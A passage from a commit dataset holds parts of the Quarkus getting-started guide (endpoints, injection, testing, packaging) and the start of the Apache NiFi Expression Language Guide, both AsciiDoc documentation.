`\/myservlet` I would just add the following to my test:\n\n\n[source,java]\n----\n@TestHTTPResource(\"\/myservlet\")\nURL testUrl;\n----\n\nThe test port can be controlled via the `quarkus.http.test-port` config property. Quarkus also creates a system\nproperty called `test.url` that is set to the base test URL for situations where you cannot use injection.\n\n\n== Packaging and run the application\n\nThe application is packaged using `mvn package`.\nIt produces 2 jar files:\n\n* `quarkus-quickstart-1.0-SNAPSHOT.jar` - containing just the classes and resources of the projects, it's the regular\nartifact produced by the Maven build;\n* `quarkus-quickstart-1.0-SNAPSHOT-runner.jar` - being an executable _jar_. Be aware that it's not an _\u00fcber-jar_ as\nthe dependencies are copied into the `target\/lib` directory.\n\nYou can run the application using: `java -jar target\/quarkus-quickstart-1.0-SNAPSHOT-runner.jar`\n\nNOTE: The `Class-Path` entry of the `MANIFEST.MF` from the _runner jar_ explicitly lists the jars from the `lib` directory.\nSo if you want to deploy your application somewhere, you need to copy the _runner_ jar as well as the _lib_ directory.\n\n== Async\n\nThe resource can also use `CompletionStage` as return type to handle asynchronous actions:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic CompletionStage<String> hello() {\n return CompletableFuture.supplyAsync(() -> {\n return \"hello\";\n });\n}\n----\n\nThe async version of the code is available in the {quickstarts-base-url}[Github] repository, in the `getting-started-async` directory.\n\n== What's next?\n\nThis guide covered the creation of an application using Quarkus.\nHowever, there is much more.\nWe recommend continuing the journey with the link:building-native-image-guide.html[building a native image guide], where you learn about the native executable creation and the packaging in a container.\n\nIn addition, the link:ide-configuration.html[developer guide] document explains how to:\n\n* scaffold a project in a single command line,\n* enable the _development model_ (hot reload)\n* import the project in your favorite IDE\n\n","old_contents":"= {project-name} - Creating Your First Application\n\n:toc: macro\n:toclevels: 4\n:doctype: book\n:icons: font\n:docinfo1:\n\n:numbered:\n:sectnums:\n:sectnumlevels: 4\n\n\nLearn how to create a Hello World Quarkus app.\nThis guide covers:\n\n* Bootstrapping an application\n* Creating a JAX-RS endpoint\n* Injecting beans\n* Functional tests\n* Packaging of the application\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven 3.5.3+\n\ninclude::.\/maven-config.adoc[tag=repositories]\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint. To demonstrate\ndependency injection this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture,width=640,height=480]\n\nThis guide also covers the testing of the endpoint.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `getting-started` directory.\n\n== Bootstrapping the project\n\nThe easiest way to create a new {project-name} project is to open a terminal and run the following command:\n\n[source, subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=getting-started \\\n -DclassName=\"org.acme.quickstart.GreetingResource\" \\\n -Dpath=\"\/hello\"\n----\n\nIt generates:\n\n* the Maven structure\n* an `org.acme.quickstart.GreetingResource` resource exposed on `\/hello`\n* an associated unit test\n* a landing page accessible on `http:\/\/localhost:8080`\n* an example of `Dockerfile`\n* the application configuration file\n\nOnce generated, look at the `pom.xml`.\nYou will find the import of the Quarkus BOM, allowing to omit the version on the different {project-name} dependencies.\nIn addition, you can see the `quarkus-maven-plugin` responsible of the packaging of the application and also providing the development mode.\n\n[source,xml,subs=attributes+]\n----\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-bom<\/artifactId>\n <version>${quarkus.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n<\/dependencyManagement>\n\n<build>\n <plugins>\n <plugin>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-maven-plugin<\/artifactId>\n <version>${quarkus.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>build<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\n[NOTE]\n.What's Quarkus?\n====\nQuarkus can be seen as {project-name} core.\n====\n\nIf we focus on the dependencies section, you can see 2 extensions allowing the development of REST applications:\n\n[source,xml]\n----\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-deployment<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-arc-deployment<\/artifactId>\n <\/dependency>\n----\n\n[NOTE]\n.What's ArC?\n====\nArC is a CDI-based dependency injection solution - see also link:cdi-reference.html[Contexts and Dependency Injection].\n====\n\n=== The JAX-RS resources\n\nDuring the project creation, the `src\/main\/java\/org\/acme\/quickstart\/GreetingResource.java` file has been created with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nIt's a very simple REST endpoint, returning \"hello\" to requests on \"\/hello\".\n\n[TIP]\n.Differences with vanilla Jax-RS\n====\nWith Quarkus no need to create an `Application` class. It's supported but not required. In addition, only one instance\nof the resource is created and not one per request. You can configure this using the different `XScoped` annotations.\n====\n\n== Running the application\n\nNow we are ready to run our application.\nUse: `mvn compile quarkus:dev`:\n\n[source, bash]\n----\n[INFO] --------------------< org.acme:quarkus-quickstart >---------------------\n[INFO] Building quarkus-quickstart 1.0-SNAPSHOT\n[INFO] --------------------------------[ jar ]---------------------------------\n[INFO]\n[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ quarkus-quickstart ---\n[INFO] Using 'UTF-8' encoding to copy filtered resources.\n[INFO] skip non existing resourceDirectory \/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started\/src\/main\/resources\n[INFO]\n[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ quarkus-quickstart ---\n[INFO] Changes detected - recompiling the module!\n[INFO] Compiling 2 source files to \/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started\/target\/classes\n[INFO]\n[INFO] --- quarkus-maven-plugin:1.0.0.Alpha1-SNAPSHOT:dev (default-cli) @ quarkus-quickstart ---\nListening for transport dt_socket at address: 5005\n2019-02-28 17:05:22,347 INFO [io.qua.dep.QuarkusAugmentor] (main) Beginning quarkus augmentation\n2019-02-28 17:05:22,635 INFO [io.qua.dep.QuarkusAugmentor] (main) Quarkus augmentation completed in 288ms\n2019-02-28 17:05:22,770 INFO [io.quarkus] (main) Quarkus 1.0.0.Alpha1-SNAPSHOT started in 0.668s. Listening on: http:\/\/localhost:8080\n2019-02-28 17:05:22,771 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n----\n\nOnce started, you can request the provided endpoint:\n\n```\n$ curl http:\/\/localhost:8080\/hello\nhello\n```\n\nHit `CTRL+C` to stop the application, but you can also keep it running and enjoy the blasting fast hot-reload.\n\n== Using injection\n\nLet's modify the application and add a companion bean.\nCreate the `src\/main\/java\/org\/acme\/quickstart\/GreetingService.java` file with the following content:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.enterprise.context.ApplicationScoped;\n\n@ApplicationScoped\npublic class GreetingService {\n\n public String greeting(String name) {\n return \"hello \" + name;\n }\n\n}\n----\n\nEdit the `GreetingResource` class to inject the `GreetingService` and create a new endpoint using it:\n\n[source, java]\n----\npackage org.acme.quickstart;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.PathParam;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\n\n@Path(\"\/hello\")\npublic class GreetingResource {\n\n @Inject\n GreetingService service;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n @Path(\"\/greeting\/{name}\")\n public String greeting(@PathParam(\"name\") String name) {\n return service.greeting(name);\n }\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String hello() {\n return \"hello\";\n }\n}\n----\n\nIf you stopped the application, restart the application with `mvn compile quarkus:dev`.\nThen check that http:\/\/localhost:8080\/hello\/greeting\/quarkus returns `hello quarkus`.\n\n== Development Mode\n\n`quarkus:dev` runs Quarkus in development mode. This enables hot deployment with background compilation, which means\nthat when you modify your Java files and refresh your browser these changes will automatically take effect. The act of\nrefreshing the browser triggers a scan of the workspace, and if any changes are detected the Java files are compiled,\nand the application is redeployed, then your request is serviced by the redeployed application. If there are any issues\nwith compilation or deployment an error page will let you know.\n\nThis will also listen for a debugger on port `5005`. If your want to wait for the debugger to attach before running you\ncan pass `-Ddebug` on the command line. If you don't want the debugger at all you can use `-Ddebug=false`.\n\n== Testing\n\nAll right, so far so good, but wouldn't it be better with a few tests, just in case.\n\nIn the generated `pom.xml` file, you can see 2 test dependencies:\n\n[source,xml,subs=attributes+]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-junit5<\/artifactId>\n <version>${quarkus.version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>io.rest-assured<\/groupId>\n <artifactId>rest-assured<\/artifactId>\n <version>{restassured-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n----\n\nQuarkus supports https:\/\/junit.org\/junit4\/[Junit 4] and https:\/\/junit.org\/junit5\/[Junit 5] tests.\nIn the generated project, we use Junit 5.\nBecause of this, the version of the https:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/[Surefire Maven Plugin] must\nbe set, as the default version does not support Junit 5:\n\n[source,xml,subs=attributes+]\n----\n<plugin>\n <artifactId>maven-surefire-plugin<\/artifactId>\n <version>${surefire.version}<\/version>\n <configuration>\n <systemProperties>\n <java.util.logging.manager>org.jboss.logmanager.LogManager<\/java.util.logging.manager>\n <\/systemProperties>\n <\/configuration>\n<\/plugin>\n----\n\nWe also set the `java.util.logging` system property to make sure tests will use the correct logmanager.\n\nThe generated project contains a simple test.\nEdit the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceTest.java` to match the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.junit.jupiter.api.Test;\n\nimport java.util.UUID;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@QuarkusTest\npublic class GreetingResourceTest {\n\n @Test \/\/ <1>\n public void testHelloEndpoint() {\n given()\n .when().get(\"\/hello\")\n .then()\n .statusCode(200) \/\/ <2>\n .body(is(\"hello\"));\n }\n\n @Test\n public void testGreetingEndpoint() {\n String uuid = UUID.randomUUID().toString();\n given()\n .pathParam(\"name\", uuid)\n .when().get(\"\/hello\/greeting\/{name}\")\n .then()\n .statusCode(200)\n .body(is(\"hello \" + uuid));\n }\n\n}\n----\n<1> By using the `QuarkusTest` runner, you instruct JUnit to start the application before the tests.\n<2> Check the HTTP response status code and content\n\nThese tests use http:\/\/rest-assured.io\/[RestAssured], but feel free to use your favorite library.\n\nYou can run the test from your IDE directly (be sure you stopped the application first), or from Maven using: `mvn test`.\n\nBy default tests will run on port `8081` so as not to conflict with the running application. We automatically\nconfigure RestAssured to use this port. If you want to use a different client you should use the `@TestHTTPResource`\nannotation to directly inject the URL of the test into a field on the test class. This field can be of the type\n`String`, `URL` or `URI`. This annotation can also be given a value for the test path. For example if I want to test\na Servlet mapped to `\/myservlet` I would just add the following to my test:\n\n\n[source,java]\n----\n@TestHTTPResource(\"\/myservlet\")\nURL testUrl;\n----\n\nThe test port can be controlled via the `quarkus.http.test-port` config property. Quarkus also creates a system\nproperty called `test.url` that is set to the base test URL for situations where you cannot use injection.\n\n\n== Packaging and run the application\n\nThe application is packaged using `mvn package`.\nIt produces 2 jar files:\n\n* `quarkus-quickstarts-1.0-SNAPSHOT.jar` - containing just the classes and resources of the projects, it's the regular\nartifact produced by the Maven build;\n* `quarkus-quickstarts-1.0-SNAPSHOT-runner.jar` - being an executable _jar_. Be aware that it's not an _\u00fcber-jar_ as\nthe dependencies are copied into the `target\/lib` directory.\n\nYou can run the application using: `java -jar target\/quarkus-quickstarts-1.0-SNAPSHOT-runner.jar`\n\nNOTE: The `Class-Path` entry of the `MANIFEST.MF` from the _runner jar_ explicitly lists the jars from the `lib` directory.\nSo if you want to deploy your application somewhere, you need to copy the _runner_ jar as well as the _lib_ directory.\n\n== Async\n\nThe resource can also use `CompletionStage` as return type to handle asynchronous actions:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic CompletionStage<String> hello() {\n return CompletableFuture.supplyAsync(() -> {\n return \"hello\";\n });\n}\n----\n\nThe async version of the code is available in the {quickstarts-base-url}[Github] repository, in the `getting-started-async` directory.\n\n== What's next?\n\nThis guide covered the creation of an application using Quarkus.\nHowever, there is much more.\nWe recommend continuing the journey with the link:building-native-image-guide.html[building a native image guide], where you learn about the native executable creation and the packaging in a container.\n\nIn addition, the link:ide-configuration.html[developer guide] document explains how to:\n\n* scaffold a project in a single command line,\n* enable the _development model_ (hot reload)\n* import the project in your favorite IDE\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12a7456f743f524b919e4d6b7baa6c3a20a13dd9","subject":"NIFI-6267: Corrects error in expression language guide.","message":"NIFI-6267: Corrects error in expression language guide.\n\nThis closes #3464\n\nCorrects small typo's in ReplaceAll entry of Expression Language Guide.\nRemoves an extraneous instance of 'Arguments:' and adds a missing 'T' to\nthe properly spell the word 'The'.\n\nSigned-off-by: Mike Thomsen <ca0fb807feba88baa8476b14928d102f26c2f6be@gmail.com>\n","repos":"YolandaMDavis\/nifi,jfrazee\/nifi,jtstorck\/nifi,jfrazee\/nifi,mattyb149\/nifi,mans2singh\/nifi,MikeThomsen\/nifi,jskora\/nifi,jfrazee\/nifi,mattyb149\/nifi,mcgilman\/nifi,jfrazee\/nifi,mcgilman\/nifi,alopresto\/nifi,pvillard31\/nifi,YolandaMDavis\/nifi,ijokarumawak\/nifi,mcgilman\/nifi,alopresto\/nifi,m-hogue\/nifi,jfrazee\/nifi,jskora\/nifi,m-hogue\/nifi,trixpan\/nifi,mans2singh\/nifi,jtstorck\/nifi,jtstorck\/nifi,YolandaMDavis\/nifi,mans2singh\/nifi,bbende\/nifi,YolandaMDavis\/nifi,pvillard31\/nifi,patricker\/nifi,patricker\/nifi,bbende\/nifi,alopresto\/nifi,pvillard31\/nifi,aperepel\/nifi,MikeThomsen\/nifi,alopresto\/nifi,jtstorck\/nifi,mans2singh\/nifi,alopresto\/nifi,mattyb149\/nifi,mattyb149\/nifi,jskora\/nifi,jskora\/nifi,pvillard31\/nifi,m-hogue\/nifi,pvillard31\/nifi,aperepel\/nifi,patricker\/nifi,pvillard31\/nifi,bbende\/nifi,jtstorck\/nifi,mattyb149\/nifi,bbende\/nifi,jtstorck\/nifi,aperepel\/nifi,ijokarumawak\/nifi,trixpan\/nifi,pvillard31\/nifi,aperepel\/nifi,mans2singh\/nifi,jskora\/nifi,ijokarumawak\/nifi,patricker\/nifi,ijokarumawak\/nifi,jtstorck\/nifi,YolandaMDavis\/nifi,trixpan\/nifi,MikeThomsen\/nifi,ijokarumawak\/nifi,trixpan\/nifi,bbende\/nifi,aperepel\/nifi,ijokarumawak\/nifi,MikeThomsen\/nifi,bbende\/nifi,jfrazee\/nifi,patricker\/nifi,trixpan\/nifi,MikeThomsen\/nifi,alopresto\/nifi,jskora\/nifi,YolandaMDavis\/nifi,YolandaMDavis\/nifi,m-hogue\/nifi,mcgilman\/nifi,mattyb149\/nifi,MikeThomsen\/nifi,patricker\/nifi,m-hogue\/nifi,alopresto\/nifi,mcgilman\/nifi,mans2singh\/nifi,patricker\/nifi,trixpan\/nifi,pvillard31\/nifi,MikeThomsen\/nifi,jfrazee\/nifi,mattyb149\/nifi,m-hogue\/nifi,m-hogue\/nifi,aperepel\/nifi,mcgilman\/nifi,jfrazee\/nifi,mcgilman\/nifi","old_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one or more\n\/\/ contributor license agreements. See the NOTICE file distributed with\n\/\/ this work for additional information regarding copyright ownership.\n\/\/ The ASF licenses this file to You under the Apache License, Version 2.0\n\/\/ (the \"License\"); you may not use this file except in compliance with\n\/\/ the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n= Apache NiFi Expression Language Guide\nApache NiFi Team <dev@nifi.apache.org>\n:homepage: http:\/\/nifi.apache.org\n:linkattrs:\n\n[[overview]]\n== Overview\nAll data in Apache NiFi is represented by an abstraction called a FlowFile.\nA FlowFile is comprised of two major pieces: content and attributes.\nThe content portion of the FlowFile represents the data on which to operate.\nFor instance, if a file is picked up from a local file system using the\nGetFile Processor, the contents of the file will become the contents of the\nFlowFile.\n\nThe attributes portion of the FlowFile represents information about the data\nitself, or metadata. Attributes are key-value pairs that represent what is\nknown about the data as well as information that is useful for routing and\nprocessing the data appropriately.\nKeeping with the example of a file that is picked up from\na local file system, the FlowFile would have an attribute called `filename` that\nreflected the name of the file on the file system. Additionally, the FlowFile will\nhave a `path` attribute that reflects the directory on the file system that this\nfile lived in. The FlowFile will also have an attribute named `uuid`, which is a\nunique identifier for this FlowFile. For complete listing of the core attributes\ncheck out the FlowFile section of the link:developer-guide.html#flowfile[Developer's Guide].\n\nHowever, placing these attributes on a FlowFile do not provide much benefit\nif the user is unable to make use of them. The NiFi Expression Language provides\nthe ability to reference these attributes, compare them to other values,\nand manipulate their values.\n\n\n[[structure]]\n== Structure of a NiFi Expression\n\nThe NiFi Expression Language always begins with the start delimiter `${` and ends\nwith the end delimiter `}`. Between the start and end delimiters is the text of the\nExpression itself. In its most basic form, the Expression can consist of just an\nattribute name. For example, `${filename}` will return the value of the `filename`\nattribute.\n\nIn a slightly more complex example, we can instead return a manipulation of this value.\nWe can, for example, return an all upper-case version of the filename by calling the\n`toUpper` function: `${filename:toUpper()}`. In this case, we reference the `filename`\nattribute and then manipulate this value by using the `toUpper` function. A function call\nconsists of 5 elements. First, there is a function call delimiter `:`. Second is the name\nof the function - in this case, `toUpper`. Next is an open parenthesis (`(`), followed\nby the function arguments. The arguments necessary are dependent upon which function\nis being called. In this example, we are using the `toUpper` function, which does not\nhave any arguments, so this element is omitted. Finally, the closing parenthesis (`)`)\nindicates the end of the function call. There are many different functions that are supported\nby the Expression Language to achieve many different goals. Some functions provide String (text)\nmanipulation, such as the `toUpper` function. Others, such as the `equals` and `matches` functions,\nprovide comparison functionality. Functions also exist for manipulating dates and times and\nfor performing mathematical operations. Each of these functions is described below, in the\n<<functions>> section, with an explanation of what the function does, the arguments that it\nrequires, and the type of information that it returns.\n\nWhen we perform a function call on an attribute, as above, we refer to the attribute as the\n_subject_ of the function, as the attribute is the entity on which the function is operating.\nWe can then chain together multiple function calls, where the return value of the first function\nbecomes the subject of the second function and its return value becomes the subject of the third\nfunction and so on. Continuing with our example, we can chain together multiple functions by using\nthe expression `${filename:toUpper():equals('HELLO.TXT')}`. There is no limit to the number of\nfunctions that can be chained together.\n\nAny FlowFile attribute can be referenced using the Expression Language. However, if the attribute\nname contains a \"special character\", the attribute name must be escaped by quoting it. The following\ncharacters are each considered \"special characters\":\n\n- $ (dollar sign)\n- | (pipe)\n- { (open brace)\n- } (close brace)\n- ( (open parenthesis)\n- ) (close parenthesis)\n- [ (open bracket)\n- ] (close bracket)\n- , (comma)\n- : (colon)\n- ; (semicolon)\n- \/ (forward slash)\n- * (asterisk)\n- ' (single quote)\n- (space)\n- \\t (tab)\n- \\r (carriage return)\n- \\n (new-line)\n\nAdditionally, a number is considered a \"special character\" if it is the first character of the attribute name.\nIf any of these special characters is present in an attribute is quoted by using either single or double quotes.\nThe Expression Language allows single quotes and double quotes to be used interchangeably. For example, the following\ncan be used to escape an attribute named `my attribute`: `${\"my attribute\"}` or `${'my attribute'}`.\n\nIn this example, the value to be returned is the value of the \"my attribute\" value, if it exists. If that attribute\ndoes not exist, the Expression Language will then look for a System Environment Variable named \"my attribute.\" If\nunable to find this, it will look for a JVM System Property named \"my attribute.\" Finally, if none of these exists,\nthe Expression Language will return a `null` value.\n\nThere also exist some functions that expect to have no subject. These functions are invoked simply\nby calling the function at the beginning of the Expression, such as `${hostname()}`. These functions\ncan then be changed together, as well. For example, `${hostname():toUpper()}`. Attempting to\nevaluate the function with subject will result in an error. In the <<functions>>\nsection below, these functions will clearly indicate in their descriptions that they do not\nrequire a subject.\n\nOften times, we will need to compare the values of two different attributes to each other.\nWe are able to accomplish this by using embedded Expressions. We can, for example, check if\nthe `filename` attribute is the same as the `uuid` attribute: `${filename:equals( ${uuid} )}`.\nNotice here, also, that we have a space between the opening parenthesis for the `equals` method and\nthe embedded Expression. This is not necessary and does not affect how the Expression is evaluated\nin any way. Rather, it is intended to make the Expression easier to read. White space is ignored by\nthe Expression Language between delimiters. Therefore, we can use the Expression\n`${ filename : equals(${ uuid}) }` or `${filename:equals(${uuid})}` and both Expressions\nmean the same thing. We cannot, however, use `${file name:equals(${uuid})}`, because this results\nin `file` and `name` being interpreted as different tokens, rather than a single token, `filename`.\n\n\n\n[[usage]]\n== Expression Language in the Application\n\nThe Expression Language is used heavily throughout the NiFi application for configuring Processor\nproperties. Not all Processor properties support the Expression Language, however. Whether or not\na Property supports the Expression Language is determined by the developer of the Processor when\nthe Processor is written. However, the application strives to clearly illustrate for each Property\nwhether or not the Expression Language is supported.\n\nIn the application, when configuring a component property, the User Interface provides an Information\nicon (\nimage:iconInfo.png[\"Info\"]\n) next to the name of the Property. Hovering over this icon with the mouse will provide a tooltip that\nprovides helpful information about the Property. This information includes a description of the Property,\nthe default value (if any), historically configured values (if any), and the evaluation scope of this\nproperty for expression language. There are three values and the evaluation scope of the expression\nlanguage is hierarchical: NONE -> VARIABLE_REGISTRY -> FLOWFILE_ATTRIBUTES.\n\n* NONE - expression language is not supported for this property\n* VARIABLE_REGISTRY is hierarchically constructed as below:\n** Variables defined at process group level and then, recursively, up to the higher process group until\nthe root process group.\n** Variables defined in custom properties files through the nifi.variable.registry.properties property\nin nifi.properties file.\n** Environment variables defined at JVM level and system properties.\n* FLOWFILE_ATTRIBUTES - will use attributes of each individual flow file, as well as those variables defined\nby the Variable Registry, as described above.\n\n[[escaping]]\n=== Escaping Expression Language\n:extra-dollar-sign: Hello $${UserName}\n:literal-value: Hello $$User$$Name\n:four-dollar-signs: $$$${abc}\n:five-dollar-signs: $$$$${abc}\n\nThere may be times when a property supports Expression Language, but the user wishes to use a literal value\nthat follows the same syntax as the Expression Language. For example, a user may want to configure a property\nvalue to be the literal text `Hello ${UserName}`. In such a case, this can be accomplished by using an extra\n`$` (dollar sign symbol) just before the expression to escape it (i.e., `{extra-dollar-sign}`). Unless the `$`\ncharacter is being used to escape an Expression, it should not be escaped. For example, the value `{literal-value}`\nshould not escape the `$` characters, so the literal value that will be used is `{literal-value}`.\n\nIf more than two `$` characters are encountered sequentially before a `{`, then each pair of `$` characters will\nbe considered an escaping of the `$` character. The escaping will be performed from left-to-right.\nTo help illustrate this, consider that the variable `abc` contains the value `xyz`. Then, consider the following\ntable of Expressions and their corresponding evaluated values:\n\n.Escaping EL Examples\n|========================================================================================\n| Expression | Value | Notes\n| `${abc}` | `xyz` |\n| `$${abc}` | `${abc}` |\n| `$$${abc}` | `$xyz` |\n| `{four-dollar-signs}` | `$${abc}` |\n| `{five-dollar-signs}` | `$$xyz` |\n| `I owe you $5` | `I owe you $5` | No actual Expression is present here.\n| `You owe me $$5 too` | `You owe me $$5 too` | The $ character is not escaped because it does not immediately precede an Expression.\n| `Unescaped $$${5 because no closing brace` | `Unescaped $$${5 because no closing brace` | Because there is no closing brace here, there is no actual Expression and hence the $ characters are not\nescaped.\n| `Unescaped $$${5} because no closing brace` | <Error> | This expression is not valid because it equates to an escaped $, followed by `${5}` and the `${5}` is not a valid Expression. The number\nmust be escaped.\n| `Unescaped $$${'5'} because no closing brace` | `Unescaped $ because no closing brace` | There is no attribute named `5` so the Expression evaluates to an empty string. The `$$` evaluates to a\nsingle (escaped) `$` because it immediately precedes an Expression.\n|========================================================================================\n\n[[editor]]\n=== Expression Language Editor\n\nWhen configuring the value of a Processor property, the NiFi User Interface provides help with the\nExpression Language using the Expression Language editor. Once an Expression is begin by typing `${`,\nthe editor begins to highlight parentheses and braces so that the user is easily able to tell which\nopening parenthesis or brace matches which closing parenthesis or brace.\n\nThe editor also supplies context-sensitive help by providing a list of all functions that can be used\nat the current cursor position. To activate this feature, press Ctrl+Space on the keyboard. The user\nis also able to type part of a function name and then press Ctrl+Space to see all functions that can\nbe used that start with the same prefix. For example, if we type into the editor `${filename:to`\nand then press Ctrl+Space, we are provided a pop-up that lists six different functions: `toDate`,\n`toLower`, `toNumber`, `toRadix`, `toString`, and `toUpper`. We can then continue typing to narrow\nwhich functions are shown, or we can select one of the functions from the list by double-clicking\nit with the mouse or using the arrow keys to highlight the desired function and pressing Enter.\n\n\n\n[[functions]]\n== Functions\n\nFunctions provide a convenient way to manipulate and compare values of attributes. The Expression Language\nprovides many different functions to meet the needs of a automated dataflow. Each function takes\nzero or more arguments and returns a single value. These functions can then be chained together to create\npowerful Expressions to evaluate conditions and manipulate values. See <<structure>> for more information\non how to call and chain functions together.\n\n[[types]]\n=== Data Types\n\nEach argument to a function and each value returned from a function has a specific data type. The Expression\nLanguage supports four different data types:\n\n- *String*: A String is a sequence of characters that can consist of numbers, letters, white space, and\n\tspecial characters.\n- *Number*: A Number is an whole number comprised of one or more digits (`0` through `9`). When converting to numbers from Date data types, they are represented as\n\tthe number of milliseconds since midnight GMT on January 1, 1970.\n- *Decimal*: A Decimal is a numeric value that can support decimals and larger values with minimal loss of precision. More precisely it\n is a double-precision 64-bit IEEE 754 floating point. Due to this minimal loss of precision this data type should not be used for\n very precise values, such as currency. For more documentation on the range of values stored in this data type\n refer to this link:https:\/\/docs.oracle.com\/javase\/specs\/jls\/se7\/html\/jls-4.html#jls-4.2.3[link^]. The following are some examples of the forms of\n literal decimals that are supported in expression language (the \"E\" can also be lower-case):\n\n * 1.1\n * .1E1\n * 1.11E-12\n\n- *Date*: A Date is an object that holds a Date and Time. Utilizing the <<dates>> and <<type_cast>> functions this data\n\ttype can be converted to\/from Strings and numbers. If the whole Expression Language expression is evaluated to be a\n\tdate then it will be converted to a String with the format: \"<Day of Week> <Month> <Day of Month> <Hour>:<Minute>:<Second> <Time Zone> <Year>\".\n\tAlso expressed as \"E MMM dd HH:mm:ss z yyyy\" in Java SimpleDateFormat format. For example: \"Wed Dec 31 12:00:04 UTC 2016\".\n- *Boolean*: A Boolean is one of either `true` or `false`.\n\nAfter evaluating expression language functions, all attributes are stored as type String.\n\nThe Expression Language is generally able to automatically coerce a value of one data type to the appropriate\ndata type for a function. However, functions do exist to manually coerce a value into a specific data type.\nSee the <<type_cast>> section for more information.\n\nHex values are supported for Number and Decimal types but they must be quoted and prepended with \"0x\" when being\ninterpreted as literals. For example these two expressions are valid (without the quotes or \"0x\" the expression would fail to run properly):\n\n - ${literal(\"0xF\"):toNumber()}\n - ${literal(\"0xF.Fp10\"):toDecimal()}\n\n\n\n\n[[boolean]]\n== Boolean Logic\n\nOne of the most powerful features of the Expression Language is the ability to compare an attribute value against\nsome other value. This is used often, for example, to configure how a Processor should route data. The following\nfunctions are used for performing boolean logic, such as comparing two values.\nEach of these functions are designed to work on values of type Boolean.\n\n\n[.function]\n=== isNull\n*Description*: [.description]#The `isNull` function returns `true` if the subject is null, `false` otherwise. This is typically used to determine\nif an attribute exists.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\t`${filename:isNull()}` returns `true` if the \"filename\" attribute does not exist.\n\tIt returns `false` if the attribute exists.\n\n\n\n[.function]\n=== notNull\n*Description*: [.description]#The `notNull` function returns the opposite value of the `isNull` function. That is, it will return `true` if the\nsubject exists and `false` otherwise.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:notNull()}` returns `true` if the \"filename\" attribute exists. It returns `false` if the attribute\n\tdoes not exist.\n\n\n\n[.function]\n=== isEmpty\n*Description*: [.description]#The `isEmpty` function returns `true` if the Subject is null, does not contain any characters\n\tor contains only white-space (new line, carriage return, space, tab), `false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:isEmpty()}` returns `true` if the \"filename\" attribute does not exist or contains only\n\twhite space. `${literal(\" \"):isEmpty()}` returns true as well as `${literal(\"\"):isEmpty()}`.\n\n\n\n\n[.function]\n=== equals\n\n[.description]\n*Description*: [.description]#The `equals` function is very widely used and determines if its subject is equal to another String value.\n\tNote that the `equals` function performs a direct comparison of two String values. Take care not to confuse 